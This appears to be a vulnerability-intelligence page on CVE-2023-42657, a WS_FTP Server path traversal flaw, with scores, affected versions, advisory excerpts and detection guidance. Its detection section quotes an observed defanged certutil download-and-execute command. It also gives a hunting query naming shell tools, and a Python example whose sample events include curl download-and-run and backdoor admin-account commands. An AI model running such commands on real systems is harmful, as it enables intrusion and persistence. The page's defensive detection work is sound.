CVE-2023-42657
Published: 2023-09-27
Priority: P1 · 83 · critical · 9.6 (CVSS 3.1)
CVSS vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:H/A:H
In the wild: VulnCheck KEV · Exploited in the wild
EPSS: 17.03% (96.7th percentile)
In WS_FTP Server versions prior to 8.7.4 and 8.8.2, a directory traversal vulnerability was discovered. An attacker could leverage this vulnerability to perform file operations (delete, rename, rmdir, mkdir) on files and folders outside of their authorized WS_FTP folder path. Attackers could also escape the context of the WS_FTP Server file structure and perform the same level of operations (delete, rename, rmdir, mkdir) on file and folder locations on the underlying operating system.
Affected
4 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| progress | ws_ftp_server | < 8.7.4 | 8.7.4 |
| progress | ws_ftp_server | >= 8.8.0 < 8.8.2 | 8.8.2 |
| progress_software_corporation | ws_ftp_server | >= 8.7.0 < 8.7.4 | 8.7.4 |
| progress_software_corporation | ws_ftp_server | >= 8.8.0 < 8.8.2 | 8.8.2 |
Detection & IOCs (extracted from sources)
Observed command line (defanged):
command/c certutil -urlcache -f hxxp://103[.]163[.]187[.]12:8080/{22-length-alphanumeric-string} %TEMP%\{10-length-alpha-string}.exe & start /B %TEMP%\{same-10-length-alpha-string}.exe
Sigma-style hunting query:
endpoint.os = 'windows' AND event.category = 'process' AND src.process.name in:anycase ('w3wp.exe') AND src.process.cmdline contains 'WSFTPSVR_WTM' AND tgt.process.cmdline contains ('certutil', 'mshta', 'powershell', 'pwsh', 'cmd', 'curl', 'wmic', 'nslookup', 'ping', 'whoami')
- Exploitation of CVE-2023-42657 spawns child processes from w3wp.exe running under the 'WSFTPSVR_WTM' application pool; hunt for w3wp.exe with cmdline containing 'WSFTPSVR_WTM' spawning certutil, mshta, powershell, pwsh, cmd, curl, wmic, nslookup, ping, or whoami
- Attack Chain 1 uses certutil with the -urlcache flag to download and execute a payload from an IP-literal URL on port 8080 with a 22-character alphanumeric path; monitor certutil.exe spawned by w3wp.exe with -urlcache arguments
- Attack Chain 2 uses curl to download cl.exe to the C:\ root and then executes it directly; monitor for curl spawned by w3wp.exe writing executables to C:\ and subsequent execution of C:/cl.exe
- Attack Chain 2 also uses OOB DNS callbacks to oastify.com subdomains for exploitation confirmation; monitor DNS queries to *.oastify.com from WS_FTP server processes
- Attack Chain 3 drops executables (n1.exe, n2.exe, s.exe, xmpp.exe, ft.exe) to C:\ProgramData and creates a local admin account named 'temp' with password 'p@ssw0rd123'; monitor for net user/localgroup commands and new files in C:\ProgramData from w3wp.exe lineage
- Exploitation began September 30, 2023; only WS_FTP Server versions prior to 8.7.4 and 8.8.2 are vulnerable, patched versions are not affected
- The vulnerability requires a low-complexity attack with no user interaction per CVSS:3.1 scoring, meaning internet-exposed WS_FTP servers are at high risk of opportunistic scanning and exploitation
- Upgrading using the full installer is the only remediation path; partial patches are insufficient
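As an added example (not code from any of the sources quoted on this page), the Python below applies the hunting query above to a handful of constructed process-creation and DNS events and labels which attack-chain indicator each hit corresponds to. The event field names mirror the query; the `dns.query` field, the documentation address 203.0.113.10 and every file name and path in the sample data are assumptions made up for illustration.

```python
"""Apply the w3wp.exe -> child-process hunting logic from the query above to
constructed events. Added example; field names mirror the query, and the
dns.query field plus every sample value are made up for illustration."""
import json
import re

# Child-command tokens from the page's query. The query is a substring
# match, so the check below is deliberately the same (case-insensitive).
SUSPICIOUS_CHILDREN = ("certutil", "mshta", "powershell", "pwsh", "cmd",
                       "curl", "wmic", "nslookup", "ping", "whoami")

# Constructed telemetry, one JSON object per line (not real events).
SAMPLE_EVENTS = r'''
{"endpoint.os": "windows", "event.category": "process", "src.process.name": "w3wp.exe", "src.process.cmdline": "w3wp.exe -ap \"WSFTPSVR_WTM\"", "tgt.process.cmdline": "cmd /c certutil -urlcache -f hxxp://203.0.113.10:8080/placeholder %TEMP%\\placeholder.exe"}
{"endpoint.os": "windows", "event.category": "process", "src.process.name": "w3wp.exe", "src.process.cmdline": "w3wp.exe -ap \"DefaultAppPool\"", "tgt.process.cmdline": "cmd /c whoami"}
{"endpoint.os": "windows", "event.category": "process", "src.process.name": "W3WP.EXE", "src.process.cmdline": "w3wp.exe -ap \"WSFTPSVR_WTM\"", "tgt.process.cmdline": "cmd /c curl hxxp://203.0.113.10/cl.exe -o C:\\cl.exe & C:\\cl.exe"}
{"endpoint.os": "windows", "event.category": "process", "src.process.name": "w3wp.exe", "src.process.cmdline": "w3wp.exe -ap \"WSFTPSVR_WTM\"", "tgt.process.cmdline": "cmd /c net user temp PLACEHOLDER /add & net localgroup administrators temp /add"}
{"endpoint.os": "windows", "event.category": "process", "src.process.name": "w3wp.exe", "src.process.cmdline": "w3wp.exe -ap \"WSFTPSVR_WTM\"", "tgt.process.cmdline": "conhost.exe 0xffffffff -ForceV1"}
{"endpoint.os": "linux", "event.category": "process", "src.process.name": "w3wp.exe", "src.process.cmdline": "w3wp.exe -ap \"WSFTPSVR_WTM\"", "tgt.process.cmdline": "cmd /c whoami"}
{"endpoint.os": "windows", "event.category": "dns", "src.process.name": "w3wp.exe", "dns.query": "abcd1234.oastify.com"}
'''


def parse_events(text):
    """One JSON object per non-empty line."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def is_wsftp_child_spawn(ev):
    """The process-creation clause of the query: a Windows w3wp.exe worker
    for the WSFTPSVR_WTM application pool spawning one of the listed tools."""
    if ev.get("endpoint.os") != "windows" or ev.get("event.category") != "process":
        return False
    if ev.get("src.process.name", "").lower() != "w3wp.exe":
        return False
    if "wsftpsvr_wtm" not in ev.get("src.process.cmdline", "").lower():
        return False
    child = ev.get("tgt.process.cmdline", "").lower()
    return any(tok in child for tok in SUSPICIOUS_CHILDREN)


def chain_tags(child_cmdline):
    """Label which of the attack-chain indicators listed above is present."""
    c = child_cmdline.lower()
    tags = []
    if "certutil" in c and "-urlcache" in c:
        tags.append("chain1:certutil-urlcache")
    # curl writing or running a .exe directly under the drive root (e.g. C:\cl.exe)
    if "curl" in c and re.search(r"c:[\\/][^\\/\s]+\.exe", c):
        tags.append("chain2:curl-to-C-root")
    if re.search(r"\bnet1?\s+(user|localgroup)\b", c):
        tags.append("chain3:local-account-change")
    if re.search(r"c:[\\/]programdata[\\/]", c):
        tags.append("chain3:programdata-drop")
    return tags


def is_oastify_callback(ev):
    """DNS lookups to *.oastify.com, the OOB confirmation seen in chain 2."""
    if ev.get("event.category") != "dns":
        return False
    q = ev.get("dns.query", "").lower().rstrip(".")
    return q == "oastify.com" or q.endswith(".oastify.com")


def scan(events):
    """Return (index, rule, tags) for every event that fires."""
    hits = []
    for i, ev in enumerate(events):
        if is_wsftp_child_spawn(ev):
            hits.append((i, "wsftp-child-spawn", chain_tags(ev["tgt.process.cmdline"])))
        elif is_oastify_callback(ev):
            hits.append((i, "oastify-dns-callback", []))
    return hits


if __name__ == "__main__":
    for idx, rule, tags in scan(parse_events(SAMPLE_EVENTS)):
        print(f"event {idx}: {rule} {tags}")
```

The second sample event (a w3wp.exe worker in a different application pool) and the fifth (a benign conhost.exe child) show the two filters that keep the rule from firing on every IIS worker; the `chain_tags` labels are only a triage aid layered on top of the page's query, so a hit with no tag is still a hit.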
CVSS provenance
| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | 3.1 | 9.6 | CRITICAL | CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:H/A:H |
| vulncheck | | 9.9 | CRITICAL | |
GHSA
GHSA-vrp3-qmw4-rx8c · ghsa_unreviewed · 2023-09-27 · CVE-2023-42657 [CRITICAL] · CWE-22
In WS_FTP Server version 8.7.0 prior to 8.7.4 and version 8.8.0 prior to 8.8.2, a directory traversal vulnerability was discovered. An attacker could leverage this vulnerability to perform file operations (delete, rename, rmdir, mkdir) on files and folders outside of their authorized WS_FTP folder path. Attackers could also escape the context of the WS_FTP Server file structure and perform the same level of operations (delete, rename, rmdir, mkdir) on file and folder locations on the underlying operating system.
VulnCheck
Progress WS_FTP Server Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
vulncheck · 2023 · CVSS 9.9 · CVE-2023-42657 [CRITICAL]
In WS_FTP Server versions prior to 8.7.4 and 8.8.2, a directory traversal vulnerability was discovered. An attacker could leverage this vulnerability to perform file operations (delete, rename, rmdir, mkdir) on files and folders outside of their authorized WS_FTP folder path. Attackers could also escape the context of the WS_FTP Server file structure and perform the same level of operations (delete, rename, rmdir, mkdir) on file and folder locations on the underlying operating system.
Affected: Progress WS_FTP Server
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation Re
No detection rules found.
No public exploits indexed.
SentinelOne
Threat Actors Actively Exploiting Progress WS_FTP via Multiple Attack Chains
blogs_sentinelone · 2023-10-09 · CVSS 10.0 · CVE-2023-40044 [CRITICAL]
Starting on September 30, 2023, SentinelOne has observed actors exploiting the recently disclosed flaws in Progress' WS_FTP against Windows servers running a vulnerable version of the software. The two highest severity vulnerabilities, CVE-2023-40044 and CVE-2023-42657, were assigned a CVSS score of 10 and 9.9, respectively. We observed at least three types of multi-stage attack chains, which begin with exploitation, and then commands to download a payload from a remote server, often via an IP-literal URL.
This active, in-the-wild exploitation marks the third wave of attacks against a Progress Software product in 2023. While exploitation is likely opportunistic, organizations in the Information Technology Managed Service Provider (IT MSP), Software and Technology, Legal Services, Engineeri
Tenable
CVE-2023-40044, CVE-2023-42657: Progress Software Patches Multiple Vulnerabilities in WS_FTP Server
blogs_tenable · 2023-10-02 · CVSS 10.0 · [CRITICAL]
Huntress
Critical Vulnerabilities: WS_FTP Exploitation | Huntress
blogs_huntress · 2023-10-02 · CVSS 6.1 · CVE-2023-40044 [MEDIUM]
On Thursday, September 28, 2023, software vendor Progress released a security advisory for numerous vulnerabilities affecting the WS_FTP Server Ad Hoc Transfer Module within their WS_FTP software.
These vulnerabilities were disclosed as:
- CVE-2023-40044 (CVSS 10)
- CVE-2023-42657 (CVSS 9.9)
- CVE-2023-40045 (CVSS 8.3)
- CVE-2023-40046 (CVSS 8.2)
- CVE-2023-40048 (CVSS 6.8)
- CVE-2022-27665 (CVSS 6.1)
- CVE-2023-40049 (CVSS 5.3)
Most notable amongst these were CVE-2023-40044 and CVE-2023-42657, both critical severity issues. Throughout this past weekend, the cybersecurity industry has been chasing CVE-2023-40044 specifically.
## What We Know So Far
As disclosed by Progress, CVE-2023-40044 is the critical (CVSS: 10) remote code execution vulnerability that does not require authentication.
Check Point
2nd October – Threat Intelligence Report
blogs_checkpoint · 2023-10-02 · CVE-2023-5217
For the latest discoveries in cyber research for the week of 2nd October, please download our Threat_Intelligence Bulletin.
TOP ATTACKS AND BREACHES
Check Point researchers have detected a phishing campaign exploiting popular file-sharing program Dropbox. The threat actors use legitimate Dropbox pages to send official email messages to the victims, which will then redirect the recipients to credential stealing pages.
Japanese entertainment giant Sony, as well as major
BleepingComputer
Progress warns of maximum severity WS_FTP Server vulnerability
blogs_bleepingcomputer · 2023-09-28 · CVSS 10.0 · [CRITICAL]
By Sergiu Gatlan
Progress Software, the maker of the MOVEit Transfer file-sharing platform recently exploited in widespread data theft attacks, warned customers to patch a maximum severity vulnerability in its WS_FTP Server software.
The company says thousands of IT teams worldwide use its enterprise-grade WS_FTP Server secure file transfer software.
In an advisory published on Wednesday, Progress disclosed multiple vulnerabilities impacting the software's manager interface and Ad hoc Transfer Module.
Out of all WS_FTP Server security flaws patched this week, two of them were rated as critical, with the one tracked as CVE-2023-40044 receiving a maximum 10/10 severity rating and allowing unauthenticated attackers to exec